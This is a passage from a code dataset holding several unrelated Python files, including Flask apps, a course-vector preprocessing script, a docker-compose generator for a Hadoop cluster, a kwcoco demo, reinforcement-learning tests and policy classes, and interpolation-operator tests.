duration).strftime(\"%Y%m%dT%H%M%S\")\n\n\tlog(\" startDate: \" + str(startDate) + \"\\n\")\n\tlog(\" endDate: \" + str(endDate) + \"\\n\")\n\n\tvcal = \"BEGIN:VCALENDAR\"+\"\\n\"\n\tvcal += \"VERSION:2.0\"+\"\\n\"\n\tvcal += \"PRODID:-//Example Corp.//CalDAV Client//EN\"+\"\\n\"\n\tvcal += \"BEGIN:VEVENT\"+\"\\n\"\n\tvcal += \"UID:\" + str(uuid.uuid4()) + \"\\n\" # unique UID per event; reusing one constant makes servers treat every event as the same one\n\tvcal += \"DTSTAMP:\" + creationDate +\"\\n\"\n\tvcal += \"DTSTART:\" + startDate +\"\\n\"\n\tvcal += \"DTEND:\" + endDate +\"\\n\"\n\tvcal += \"SUMMARY:\" + eventtype + \"\\n\"\n\tvcal += \"END:VEVENT\"+\"\\n\"\n\tvcal += \"END:VCALENDAR\"\n\n\tlog(\" entry: \" + vcal + \"\\n\")\n\n\tcalendars = connectCalendar()\n\tif (len(calendars) <= 0):\n\t\tspeech_text = \"Unfortunately I could not connect to your calendar\"\n\t\tlog(\"ERROR: \" + speech_text + \"\\n\")\n\telse:\n\t\t# This could be so much easier if we had something like \"if (calendar.isReadOnly())\"\n\t\ti = 0\n\t\tlog(\" found calendar: #\" + str(len(calendars)) + \"\\n\")\n\t\tfor calendar in calendars:\n\t\t\tlog(\" [\" + str(i + 1) + \"]: \" + str(calendar) + \"\\n\")\n\t\t\ttry:\n\t\t\t\tevent = calendar.add_event(vcal)\n\t\t\t\tspeech_text = \"Event has been added!\"\n\n\t\t\t\t# Everything worked out well and the event has been entered into one calendar -> we do not have to try the other calendars and therefore skip the loop\n\t\t\t\tbreak\n\t\t\texcept Exception as te:\n\t\t\t\tif (i >= len(calendars) - 1): # the last calendar failed too; the original \"i >= len(calendars)\" could never be true\n\t\t\t\t\tspeech_text = \"All of your calendars are read-only\"\n\t\t\t\t\tlog(\"ERROR: \" + speech_text + \"\\n\")\n\t\t\t\t\tlog(\"ERROR: \" + str(te) + \"\\n\")\n\t\t\t\telse:\n\t\t\t\t\tlog(\" Couldn't write to calendar: \" + str(calendar) + \". Try the next calendar...\\n\")\n\t\t\t\t\t# Try using the next calendar... we will fail when the event could not be added to any calendar
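\n\t\t\t\t\t# (added note: python-caldav signals a refused write by raising an exception; this loop treats any exception as \"this calendar is read-only\" and moves on)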
\n\t\t\t\t\ti = i + 1\n\n\tlog(\" text: \" + speech_text + \"\\n\")\n\treturn statement(speech_text).simple_card('Calendar Events', speech_text)\n\n#print getTodayEvents()\nif __name__ == '__main__':\n\tapp.run(host=\"127.0.0.1\", port=config[\"calexaPort\"])\n","sub_path":"calexa-eng.py","file_name":"calexa-eng.py","file_ext":"py","file_size_in_byte":7392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581436067","text":"from flask import Flask, render_template, request\nfrom MathematicalProgramming.core.model import *\nfrom MathematicalProgramming.scripts import *\nimport json\n\napp = Flask(__name__)\n\n\nclass TEX():\n def __init__(self):\n self.TeX = ''\n\n\ntex = TEX()\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef MathematicalProgramming():\n\n if request.method == 'POST':\n file = request.files['model']\n model_dict = json.load(file)\n if model_dict['type'] == 'SP':\n model = SPModel(model_dict['f'], model_dict['extremum'])\n n = len(model_dict.keys()) - 6 # 6 fixed keys (type, f, extremum, a, b, count); the rest are conditions\n for i in range(n):\n condition = model_dict['condition' + str(i)]\n model.add_condition(condition['left'], condition['sign'],\n condition['right'])\n\n tex.TeX = SPscript(model, model_dict['a'], model_dict['b'],\n model_dict['count'])\n return render_template('index.html', TeX=tex.TeX.replace('\\n', ''))\n return render_template('index.html', TeX=tex.TeX) # fall through for GET requests and non-SP models instead of returning None
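\n\n# Hedged usage note: the POSTed \"model\" file is expected to be JSON shaped roughly like\n# {\"type\": \"SP\", \"f\": ..., \"extremum\": ..., \"a\": ..., \"b\": ..., \"count\": ...,\n# \"condition0\": {\"left\": ..., \"sign\": ..., \"right\": ...}, ...}\n# (key names inferred from the handler above; the value shapes depend on SPModel/SPscript).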
\n\n\n@app.route('/latex')\ndef latex():\n return tex.TeX\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"mpapp.py","file_name":"mpapp.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"637148588","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport os\nimport json\n\nOUT_DIR = os.environ[\"outDir\"]\nCOURSE_VECTOR_DIR = OUT_DIR\nCOURSE_INFO_DIR = '../shared/course_api/outputs'\nINTERMEDIATE_DATA_DIR = './data'\nvectors_path = COURSE_VECTOR_DIR + '/course2vec.npy'\nvec2course_path = COURSE_VECTOR_DIR + '/idx2course.json'\ncourse_info_path = COURSE_INFO_DIR + '/course_description_init.tsv'\n\nprint('[INFO] Begin data preprocessing stage...')\nprint('[INFO] Reading in course vectors...')\n\nvectors = np.load(vectors_path)\n\nwith open(vec2course_path) as json_data:\n vec2course_map = json.load(json_data)\n\nvect_dict = {}\nfor vector_id in vec2course_map.keys():\n vect_dict[int(vector_id)] = vectors[int(vector_id)-1]\n\nvect_df = pd.DataFrame(vect_dict).T\nvect_df.index.name = 'vector_id'\nvect_df.reset_index(inplace = True)\n\ncourse_identifier_list = [vec2course_map[str(vec_id)] for vec_id in vect_df['vector_id']]\nvect_df.insert(loc = 1, column = 'vector_course_identifier', value = course_identifier_list)\n\nprint('[INFO] Transforming vectors done.')\n\nprint('[INFO] Reading in course descriptions...')\n\ndescript_df = pd.read_csv(course_info_path, sep = '\\t')[['abbr_cid', 'course_num', 'course_subject', 'course_description', 'course_title']]\n\ndescript_df['course_name'] = descript_df['abbr_cid'].str.replace('_', ' ').str.lower().str.capitalize()\ndescript_df['course_alternative_names'] = descript_df['course_subject'] + ' ' + descript_df['course_num']\ndescript_df['course_alternative_names'] = descript_df['course_alternative_names'] + ' ' + descript_df['abbr_cid'].str.replace('_', '')\n# add custom abbreviations here\ndescript_df['vector_course_identifier'] = descript_df['course_subject'] + '_' + descript_df['course_num']\ndescript_df.drop(['course_num', 'abbr_cid'], axis = 1, inplace = True)\n\nprint('[INFO] Transforming course descriptions done.')\n\nprint('[INFO] Removing courses with generic descriptions.')\ndescript_df = descript_df[~descript_df.course_description.isna()]\ncourses_to_remove = ['Freshman Seminar', 'Freshman Seminars', 'Freshman/Sophomore Seminar', 'Sophomore Seminar', 'Sophomore Seminars', 'Berkeley Connect']\nremove_regex = '|'.join(courses_to_remove)\ndescript_df = descript_df[~descript_df.course_title.str.contains(remove_regex, regex=True)]\ndescript_df = descript_df[~descript_df.course_name.str.contains('99')]\ndescript_df = descript_df[~descript_df.course_name.str.contains('98')]\ndescript_df = descript_df[~descript_df.course_name.str.contains('97')]\ndescript_df = descript_df[~descript_df.course_title.str.contains('special topics', case=False)]\ndescript_df = descript_df[~descript_df.course_title.str.contains('seminar', case=False)]\ndescript_df = descript_df[~descript_df.course_subject.str.contains('FPF', case=True)]\n\nprint('[INFO] Removing courses with generic descriptions done.')\n\nprint('[INFO] Merging vectors and descriptions...')\n\nvector_course_text_df = pd.merge(vect_df, descript_df, on = 'vector_course_identifier', how = 'left')\nvector_course_text_df.drop('vector_course_identifier', axis = 1, inplace = True)\n
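# The left join above leaves course_name null for vectors without a metadata row; drop those.\nvector_course_text_df = 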
vector_course_text_df[vector_course_text_df['course_name'].notnull()]\n\nprint('[INFO] Extract raw course vectors...')\n\nraw_vectors = vector_course_text_df[vector_course_text_df.columns.difference(['course_name', 'course_title', 'course_description', 'course_subject', 'course_alternative_names', 'vector_id'])]\n\nprint('[INFO] Extract corresponding course information...')\nvector_text = vector_course_text_df[['course_name', 'course_title', 'course_description', 'course_subject', 'course_alternative_names']]\n\nprint('[INFO] Writing to tsv files...')\n\nvector_text.to_csv(INTERMEDIATE_DATA_DIR+'/aligned_course_info.tsv', sep='\\t', index = False)\nraw_vectors.to_csv(INTERMEDIATE_DATA_DIR+'/aligned_course_vecs.tsv', sep='\\t', index = False)\n\nprint('[INFO] Data preprocessing complete.')\n","sub_path":"scripts/data_joining.py","file_name":"data_joining.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"401149291","text":"import yaml\nfrom yaml import dump\ntry:\n from yaml import CDumper as Dumper\nexcept ImportError:\n from yaml import Dumper\nimport copy\nfrom collections import OrderedDict\nfrom instance import DockerComponent, MultipleComponent, PrimaryNamenode, SecondaryNamenode, JournalNode, DataNode, \\\n ResourceManager, YarnHistoryServer, ClusterStarter, ClusterDb, ZookeeperNode, HiveServer, HiveMetastore, \\\n SparkHistory, SparkThrift, Hue, PrestoServer, PrestoWorker\nfrom argparse import Namespace\nfrom typing import List\n\n\n\nDOCKER_COMPOSE_YAML = OrderedDict({\n \"version\": \"3\",\n \"services\": {},\n \"networks\": {\n \"hadoop.net\": {\n \"external\": True\n }\n }\n})\n\nyaml.add_representer(type(None), lambda dumper, value: dumper.represent_scalar(u'tag:yaml.org,2002:null', ''),\n Dumper=Dumper)\nyaml.add_representer(OrderedDict, lambda self, data: self.represent_mapping('tag:yaml.org,2002:map', data.items()),\n Dumper=Dumper)\n\n\ndef generate_yaml(instances: List[DockerComponent]):\n compose_yaml = copy.deepcopy(DOCKER_COMPOSE_YAML)\n for instance in instances:\n instance_conf = {\n \"image\": instance.image,\n \"container_name\": instance.name,\n \"networks\": {\n \"hadoop.net\": None\n },\n \"tty\": True\n }\n if getattr(instance, \"ports\", None) and instance.ports: # default None: not every component defines every attribute\n instance_conf[\"ports\"] = list(instance.ports)\n\n if getattr(instance, \"hosts\", None) and instance.hosts:\n instance_conf[\"networks\"][\"hadoop.net\"] = {\"aliases\": list(instance.hosts)}\n\n if getattr(instance, \"volumes\", None) and instance.volumes:\n instance_conf[\"volumes\"] = list(instance.volumes)\n\n if getattr(instance, \"environment\", None) and instance.environment:\n instance_conf[\"environment\"] = instance.environment\n\n if getattr(instance, \"more_options\", None) and instance.more_options:\n for k, v in instance.more_options.items():\n instance_conf[k] = v\n\n compose_yaml[\"services\"][instance.name] = instance_conf\n return dump(compose_yaml, Dumper=Dumper)\n\n\ndef build_components(args: Namespace) -> List[DockerComponent]:\n components = [ClusterStarter()]\n\n if args.all or args.hive or args.hue:\n components.append(ClusterDb(args))\n primary_nn = [PrimaryNamenode(), JournalNode(1), ZookeeperNode(1), YarnHistoryServer()]\n if args.all or args.hive:\n primary_nn.append(HiveServer())\n primary_nn.append(HiveMetastore())\n\n if args.all or args.presto:\n primary_nn.append(PrestoServer())\n\n components.append(MultipleComponent(\"primary-namenode\", primary_nn))\n
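\n # The secondary-namenode host also carries the ResourceManager and, when the\n # matching flags are set, the Spark history/thrift services appended just below.\n secondary_nn = [SecondaryNamenode(), 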
JournalNode(2), ZookeeperNode(2), ResourceManager()]\n\n if args.all or args.spark or args.spark_history or args.spark_thrift:\n secondary_nn.append(SparkHistory())\n\n if args.all or args.spark_thrift:\n secondary_nn.append(SparkThrift())\n\n components.append(MultipleComponent(\"secondary-namenode\", secondary_nn))\n\n datanode1 = [DataNode(1), JournalNode(3), ZookeeperNode(3)]\n if args.all or args.presto:\n datanode1.append(PrestoWorker(1))\n components.append(MultipleComponent(\"datanode1\", datanode1))\n\n additional_datanodes = []\n for i in range(2, args.num_datanode + 1):\n additional_datanodes.append(DataNode(i))\n\n # Add presto worker in data node, num of presto worker does not exceed num of datanode\n if (args.all or args.presto) and args.num_presto_worker > 1:\n worker_cnt = 1\n while worker_cnt < args.num_presto_worker and worker_cnt < len(additional_datanodes):\n datanode = additional_datanodes[worker_cnt - 1]\n additional_datanodes[worker_cnt - 1] = MultipleComponent(datanode.name, [datanode,\n PrestoWorker(worker_cnt + 1)])\n worker_cnt += 1\n\n components += additional_datanodes\n\n if args.hue or args.all:\n components.append(Hue(args))\n\n return components\n","sub_path":"docker_compose.py","file_name":"docker_compose.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"431811050","text":"\"\"\"\nDemonstrates the core kwcoco spaces: video, image, and asset space.\n\"\"\"\n\n\ndef setup_data():\n \"\"\"\n This creates aligned video data similar to what might exist in a real world\n use case.\n \"\"\"\n import ubelt as ub\n import kwimage\n\n demo_dpath = ub.Path.appdir('kwcoco/demo/demo_spaces').ensuredir()\n asset_dpath = (demo_dpath / 'assets').ensuredir()\n raw = kwimage.grab_test_image('amazon', dsize=(512, 512))\n raw = kwimage.ensure_float01(raw)\n\n import kwcoco\n dset = kwcoco.CocoDataset()\n dset.fpath = demo_dpath / 'data.kwcoco.json'\n\n video_id = dset.add_video(name='demo_video', width=512, height=512)\n\n observations = [\n {'warp_img_from_vid': kwimage.Affine.coerce(offset=(-32, -32), theta=0.02)},\n {'warp_img_from_vid': kwimage.Affine.coerce(offset=(-64, -64), theta=0.05)},\n {'warp_img_from_vid': kwimage.Affine.coerce(offset=(-128, -128), theta=0.08)},\n ]\n for frame_idx, obs in enumerate(observations):\n warp_img_from_vid = obs['warp_img_from_vid']\n\n ideal_img_frame = kwimage.warp_affine(raw, warp_img_from_vid, dsize='positive', border_value=float('nan'))\n img_h, img_w = ideal_img_frame.shape[0:2]\n\n # pan is shifted a little bit\n pan = kwimage.convert_colorspace(ideal_img_frame, 'rgb', 'gray')\n warp_pan_from_img = kwimage.Affine.coerce(offset=(-2, -3))\n\n image_name = f'frame_{frame_idx:03d}'\n frame_dpath = (asset_dpath / image_name).ensuredir()\n\n pan_fpath = frame_dpath / 'pan.tif'\n red_fpath = frame_dpath / 'red.tif'\n green_fpath = frame_dpath / 'green.tif'\n blue_fpath = frame_dpath / 'blue.tif'\n\n # Some assets are smaller than others\n warp_msi_from_img = kwimage.Affine.scale(0.5)\n msi = kwimage.warp_affine(ideal_img_frame, warp_msi_from_img, dsize='positive', border_value=float('nan'))\n red = msi[..., 0]\n green = msi[..., 1]\n blue = msi[..., 2]\n\n kwimage.imwrite(pan_fpath, pan)\n kwimage.imwrite(red_fpath, red)\n kwimage.imwrite(green_fpath, green)\n kwimage.imwrite(blue_fpath, blue)\n\n gid = dset.add_image(name=image_name, frame_index=frame_idx,\n width=img_w, height=img_h, video_id=video_id,\n 
warp_img_to_vid=warp_img_from_vid.inv())\n\n coco_img = dset.coco_image(gid)\n\n coco_img.add_asset(pan_fpath, channels='pan', warp_aux_to_img=warp_pan_from_img.inv())\n coco_img.add_asset(red_fpath, channels='red', warp_aux_to_img=warp_msi_from_img.inv())\n coco_img.add_asset(green_fpath, channels='green', warp_aux_to_img=warp_msi_from_img.inv())\n coco_img.add_asset(blue_fpath, channels='blue', warp_aux_to_img=warp_msi_from_img.inv())\n return dset\n\n\ndef main():\n import kwimage\n dset = setup_data()\n\n def build_space_frames(space):\n frame_stack = []\n for coco_img in dset.images().coco_images:\n frame_index = coco_img.img['frame_index']\n asset_stack = []\n for chan in coco_img.channels.fuse().to_list():\n asset_data = coco_img.imdelay(chan, space=space).finalize(nodata_method='float')\n asset_data = kwimage.fill_nans_with_checkers(asset_data)\n asset_data = kwimage.draw_header_text(asset_data, f'T={frame_index} : {chan}')\n asset_stack.append(asset_data)\n asset_row = kwimage.stack_images(asset_stack, axis=1, pad=10, bg_value='kitware_green')\n frame_stack.append(asset_row)\n canvas = kwimage.stack_images(frame_stack, axis=0, pad=10, bg_value='kitware_green')\n return canvas\n\n asset_canvas = build_space_frames(space='asset')\n image_canvas = build_space_frames(space='image')\n video_canvas = build_space_frames(space='video')\n\n import ubelt as ub\n asset_blurb = ub.codeblock(\n '''\n This is a demonstration of \"asset space\".\n Each frame is a row, and each channel is a column.\n This is how images are saved on disk.\n Any alignment is delayed until the last possible moment.\n ''')\n image_blurb = ub.codeblock(\n '''\n This is a demonstration of \"image space\".\n Assets are aligned within an image, but are not necesarilly aligned across frames.\n The resolution is typically that of the largest asset in the image, but can be arbitrary.\n ''')\n video_blurb = ub.codeblock(\n '''\n This is a demonstration of \"video space\".\n Assets are aligned within an image and across frames.\n Resolution is usually set to that of some reference image, but it can be arbitrary.\n ''')\n\n import kwplot\n kwplot.autompl()\n kwplot.imshow(asset_canvas, title=asset_blurb, fnum=1)\n kwplot.imshow(image_canvas, title=image_blurb, fnum=2)\n kwplot.imshow(video_canvas, title=video_blurb, fnum=3)\n","sub_path":"examples/demo_kwcoco_spaces.py","file_name":"demo_kwcoco_spaces.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"482005929","text":"\"\"\" Test module for ddpg.model\n\nMostly based on baselines.common.tests.test_identity.py\n\"\"\"\n\nfrom itertools import chain\nimport pytest\nimport numpy as np\nimport tensorflow as tf\nimport logging\nfrom baselines.common.tests.envs.identity_env import BoxIdentityEnv\nfrom ddpg.experience_replay import ExperienceReplay\nfrom ddpg.main import parse_args\nfrom ddpg.monitor import Monitor\nfrom ddpg.model import Model\nfrom ddpg.runner import OrnsteinUhlenbeckNoise, Runner\n\nSEED = 2\nGAMMA = 0.9\nTOTAL_TIMESTEPS = 1100000\n\ndef test_target_update():\n \"\"\" Test if target update is working correctly. 
\"\"\"\n env = BoxIdentityEnv((1,), episode_len=100)\n kwargs = parse_args()\n kwargs['experience_replay_size'] = 10\n kwargs['minibatch_size'] = 5\n tf.reset_default_graph()\n tf.set_random_seed(SEED)\n np.random.seed(SEED)\n monitor = Monitor(env, None, 100)\n state = env.reset()\n experience_replay = ExperienceReplay(kwargs['experience_replay_size'], kwargs['minibatch_size'],\n state_shape=state.shape,\n action_shape=env.action_space.shape)\n noise = OrnsteinUhlenbeckNoise(np.zeros(env.action_space.shape),\n kwargs['ou_theta'], kwargs['ou_sigma'])\n model = Model(env, **kwargs) # pylint:disable=missing-kwoa\n variables = list(chain(*model._primary_parameters))\n target_variables = list(chain(*model._target_parameters))\n runner = Runner(monitor, model, kwargs['test'], render=kwargs['render'],\n experience_replay=experience_replay,\n ou_noise=noise)\n with tf.Session() as sess:\n model.initialize(sess)\n values = sess.run(variables)\n target_values = sess.run(target_variables)\n for val, target_val, _, _ in zip(values, target_values, variables, target_variables):\n assert np.allclose(val, target_val)\n # Check for soft update\n for _ in range(15):\n runner.step()\n target_values = sess.run(target_variables)\n runner.train()\n for new_var, new_target_var, target_val in zip(variables, target_variables, target_values):\n new_val, new_target_val = sess.run((new_var, new_target_var))\n # new_target_val should be closer to target_val than new_val\n assert np.all(np.abs(new_target_val - target_val) - 1e-5 <= np.abs(new_target_val - new_val) + 1e-5 )\n\ndef test_reuse():\n \"\"\" Test if parameters are reused for primary network.\n\n The parameters of the critic_with_actor network and critic/actor networks must be the same. \"\"\"\n env = BoxIdentityEnv((1,), episode_len=100)\n kwargs = parse_args()\n kwargs['experience_replay_size'] = 10\n kwargs['minibatch_size'] = 5\n tf.reset_default_graph()\n tf.set_random_seed(SEED)\n np.random.seed(SEED)\n monitor = Monitor(env, None, 100)\n state = env.reset()\n experience_replay = ExperienceReplay(kwargs['experience_replay_size'], kwargs['minibatch_size'],\n state_shape=state.shape,\n action_shape=env.action_space.shape)\n noise = OrnsteinUhlenbeckNoise(np.zeros(env.action_space.shape),\n kwargs['ou_theta'], kwargs['ou_sigma'])\n model = Model(env, **kwargs) # pylint:disable=missing-kwoa\n runner = Runner(monitor, model, kwargs['test'], render=kwargs['render'],\n experience_replay=experience_replay,\n ou_noise=noise)\n with tf.Session() as sess:\n model.initialize(sess)\n for _ in range(15):\n runner.step()\n runner.train()\n state = runner._state[np.newaxis, :]\n critic_with_actor = sess.run(model._critic_with_actor, feed_dict={model._state: state,\n model._training_phase: False})\n actor = model.next_action(runner._state)\n critic = sess.run(model._critic, feed_dict={model._state: state,\n model._critic_action: actor,\n model._training_phase: False})\n assert np.all(critic == critic_with_actor)\n\n@pytest.mark.slow\ndef test_discrete_identity():\n \"\"\" Test if it learns BoxIdentityEnv \"\"\"\n import os.path\n env = BoxIdentityEnv((1,), episode_len=100)\n kwargs = parse_args()\n log_level = kwargs['log_level']\n log_dir = kwargs['log_dir']\n log_path = os.path.join(log_dir, 'main.log')\n logging.basicConfig(level=getattr(logging, log_level.upper()), filename=log_path)\n tf.reset_default_graph()\n tf.set_random_seed(SEED)\n monitor = Monitor(env, log_dir, 100)\n state = env.reset()\n experience_replay = 
ExperienceReplay(kwargs['experience_replay_size'], kwargs['minibatch_size'],\n state_shape=state.shape,\n action_shape=env.action_space.shape)\n noise = OrnsteinUhlenbeckNoise(np.zeros(env.action_space.shape),\n kwargs['ou_theta'], kwargs['ou_sigma'])\n model = Model(env, **kwargs) # pylint:disable=missing-kwoa\n runner = Runner(monitor, model, kwargs['test'], log_dir=log_dir, render=kwargs['render'],\n experience_replay=experience_replay,\n ou_noise=noise)\n with tf.Session() as sess:\n model.initialize(sess)\n for _ in range(30000):\n runner.step()\n runner.train()\n assert np.all(monitor.average > -1),\\\n 'average reward {} is less than -1'.format(monitor.average[0])\n\nif __name__ == '__main__':\n test_discrete_identity()\n","sub_path":"test/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"636225483","text":"import numpy as np\n\nfrom mushroom.utils.parameters import Parameter\n\n\nclass TDPolicy(object):\n def __init__(self):\n \"\"\"\n Constructor.\n\n \"\"\"\n self._approximator = None\n\n def __call__(self, *args):\n \"\"\"\n Compute the probability of taking action in a certain state following\n the policy.\n\n Args:\n *args (list): list containing a state or a state and an action.\n\n Returns:\n The probability of all actions following the policy in the given\n state if the list contains only the state, else the probability\n of the given action in the given state following the policy.\n\n \"\"\"\n raise NotImplementedError\n\n def draw_action(self, state):\n \"\"\"\n Sample an action in `state` using the policy.\n\n Args:\n state (np.ndarray): the state where the agent is.\n\n Returns:\n The action sampled from the policy.\n\n \"\"\"\n raise NotImplementedError\n\n def set_q(self, approximator):\n \"\"\"\n Args:\n approximator (object): the approximator to use.\n\n \"\"\"\n self._approximator = approximator\n\n def get_q(self):\n \"\"\"\n Returns:\n The approximator used by the policy.\n\n \"\"\"\n return self._approximator\n\n def __str__(self):\n return self.__name__\n\n\nclass EpsGreedy(TDPolicy):\n \"\"\"\n Epsilon greedy policy.\n\n \"\"\"\n def __init__(self, epsilon):\n \"\"\"\n Constructor.\n\n Args:\n epsilon (Parameter): the exploration coefficient. It indicates\n the probability of performing a random actions in the current\n step.\n\n \"\"\"\n self.__name__ = 'EpsGreedy'\n\n super(EpsGreedy, self).__init__()\n\n assert isinstance(epsilon, Parameter)\n self._epsilon = epsilon\n\n def __call__(self, *args):\n state = args[0]\n q = self._approximator.predict(np.expand_dims(state, axis=0)).ravel()\n max_a = np.argwhere(q == np.max(q)).ravel()\n\n p = self._epsilon.get_value(state) / float(self._approximator.n_actions)\n\n if len(args) == 2:\n action = args[1]\n if action in max_a:\n return p + (1. - self._epsilon.get_value(state)) / len(max_a)\n else:\n return p\n else:\n probs = np.ones(self._approximator.n_actions) * p\n probs[max_a] += (1. 
- self._epsilon.get_value(state)) / len(max_a)\n\n return probs\n\n def draw_action(self, state):\n if not np.random.uniform() < self._epsilon(state):\n q = self._approximator.predict(state)\n max_a = np.argwhere(q == np.max(q)).ravel()\n\n if len(max_a) > 1:\n max_a = np.array([np.random.choice(max_a)])\n\n return max_a\n\n return np.array([np.random.choice(self._approximator.n_actions)])\n\n def set_epsilon(self, epsilon):\n \"\"\"\n Setter.\n\n Args:\n epsilon (Parameter): the exploration coefficient. It indicates the\n probability of performing a random action in the current step.\n\n \"\"\"\n assert isinstance(epsilon, Parameter)\n\n self._epsilon = epsilon\n\n def update(self, *idx):\n \"\"\"\n Update the value of the epsilon parameter (e.g. in case of different\n values of epsilon for each visited state according to the number of\n visits).\n\n Args:\n idx (int): value to use to update epsilon.\n\n \"\"\"\n self._epsilon.update(*idx)\n\n\nclass Softmax(TDPolicy):\n \"\"\"\n Softmax policy using a Boltzmann distribution.\n\n \"\"\"\n def __init__(self, tau):\n \"\"\"\n Constructor.\n\n Args:\n tau (float): the temperature of the distribution. As the temperature\n approaches infinity, the policy becomes more and more random. As the\n temperature approaches 0.0, the policy becomes more and more greedy.\n\n \"\"\"\n self.__name__ = 'Softmax'\n\n super(Softmax, self).__init__()\n self._tau = tau\n\n def __call__(self, *args):\n state = args[0]\n qs = np.ones(self._approximator.n_actions)\n for a in range(self._approximator.n_actions): # range (not xrange) so this also runs on Python 3\n qs[a] = (np.e**(self._approximator.predict(state, a) / self._tau))\n\n if len(args) == 2:\n action = args[1]\n\n return qs[action] / np.sum(qs)\n else:\n p = np.ones(qs.size)\n for i in range(p.size):\n p[i] = qs[i] / np.sum(qs)\n\n return p\n\n def draw_action(self, state):\n return np.array([np.random.choice(self._approximator.n_actions,\n p=self(state))])\n","sub_path":"mushroom/policy/td_policy.py","file_name":"td_policy.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"144856982","text":"# -*- coding: utf-8 -*-\nimport socket\n\nfrom tenhou.client import TenhouClient\nfrom utils.settings_handler import settings\n\n\ndef connect_and_play():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((settings.TENHOU_HOST, settings.TENHOU_PORT))\n\n client = TenhouClient(s)\n was_auth = client.authenticate()\n\n if was_auth:\n client.start_the_game()\n else:\n client.end_the_game()\n","sub_path":"project/tenhou/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222558973","text":"# pylint: disable=missing-docstring, invalid-name\nimport unittest\nimport numpy as np\nimport obsoper\nfrom obsoper import (exceptions,\n ObservationOperator)\n\n\nclass TestOperator(unittest.TestCase):\n def setUp(self):\n # Model grid\n self.grid_lons = [[0, 1],\n [3, 2]]\n self.grid_lats = [[0, 1],\n [0, 1]]\n self.grid_depths = None\n\n # Observation positions\n self.obs_lons = [1.5]\n self.obs_lats = [0.5]\n self.obs_depths = None\n\n # Forecasts/results\n self.analysis = [[1, 2],\n [3, 4]]\n self.counterparts = [2.5]\n\n def test_interpolate_given_tripolar_grid(self):\n fixture = obsoper.Operator(self.grid_lons,\n self.grid_lats,\n self.obs_lons,\n self.obs_lats,\n layout=\"tripolar\")\n result = fixture.interpolate(self.analysis)\n 
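# (1.5, 0.5) is the centre of the single grid cell, so the interpolated value is the mean of the four corner values, 2.5\n 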
expect = self.counterparts\n np.testing.assert_array_almost_equal(expect, result, decimal=4)\n\n def test_interpolate_given_regular_grid(self):\n fixture = obsoper.Operator([100, 200],\n [10, 20],\n [120],\n [12],\n layout=\"regular\")\n result = fixture.interpolate(self.analysis)\n expect = [1.6]\n np.testing.assert_array_almost_equal(expect, result)\n\n def test_interpolate_given_regional_grid(self):\n fixture = obsoper.Operator(self.grid_lons,\n self.grid_lats,\n self.obs_lons,\n self.obs_lats,\n layout=\"regional\")\n result = fixture.interpolate(self.analysis)\n expect = self.counterparts\n np.testing.assert_array_equal(expect, result)\n\n def test_constructor_given_unknown_layout_raises_exception(self):\n with self.assertRaises(exceptions.UnknownLayout):\n obsoper.Operator(None, None, None, None, layout=\"not a layout\")\n\n\nclass TestIncompatibleGrids(unittest.TestCase):\n def setUp(self):\n self.obs_shape = 7\n self.grid_shape = 3, 3\n self.different_grid_shape = 5, 5\n\n def test_interpolate_given_incompatible_shape_raises_exception(self):\n operator = obsoper.Operator(\n np.zeros(self.grid_shape),\n np.zeros(self.grid_shape),\n np.zeros(self.obs_shape),\n np.zeros(self.obs_shape))\n with self.assertRaises(exceptions.IncompatibleGrid):\n operator.interpolate(np.zeros(self.different_grid_shape))\n\n def test_interpolate_tripolar_given_incompatible_shape_raises_exception(self):\n operator = obsoper.Operator(\n np.zeros(self.grid_shape),\n np.zeros(self.grid_shape),\n np.zeros(self.obs_shape),\n np.zeros(self.obs_shape),\n layout=\"tripolar\")\n with self.assertRaises(exceptions.IncompatibleGrid):\n operator.interpolate(np.zeros(self.different_grid_shape))\n\n\nclass TestOperatorRegularGrid(unittest.TestCase):\n def setUp(self):\n self.grid_lons = np.array([0, 1])\n self.grid_lats = np.array([0, 1])\n self.s_levels = np.array([[[0, 1],\n [0, 1]],\n [[0, 1],\n [0, 2]]])\n self.z_levels = np.array([0, 1])\n self.field = np.array([[[11, 12],\n [13, 14]],\n [[21, 22],\n [23, 24]]])\n self.z_counterparts = 17.5\n self.s_counterparts = 17.4\n\n def make_operator(self, levels):\n obs_lons, obs_lats, obs_depths = [0.5], [0.5], [0.5]\n return obsoper.Operator(self.grid_lons,\n self.grid_lats,\n obs_lons,\n obs_lats,\n observed_depths=obs_depths,\n grid_depths=levels)\n\n def test_vertical_interpolation_given_regular_layout_and_s_levels(self):\n self.check_interpolate(self.s_levels, self.s_counterparts)\n\n def test_vertical_interpolation_given_regular_layout_and_z_levels(self):\n self.check_interpolate(self.z_levels, self.z_counterparts)\n\n def check_interpolate(self, levels, expect):\n fixture = self.make_operator(levels)\n result = fixture.interpolate(self.field)\n np.testing.assert_array_almost_equal(expect, result)\n\n\nclass TestObservationOperator(unittest.TestCase):\n def setUp(self):\n self.longitudes = np.arange(3)\n self.latitudes = np.arange(3)\n self.depths = np.tile([10, 20, 30, 40], (3, 3, 1))\n self.fixture = ObservationOperator(self.longitudes, self.latitudes,\n self.depths)\n\n # Pseudo-model field\n self.surface_field = np.ones((3, 3))\n self.full_field = np.ones((3, 3, 4))\n\n # Sample 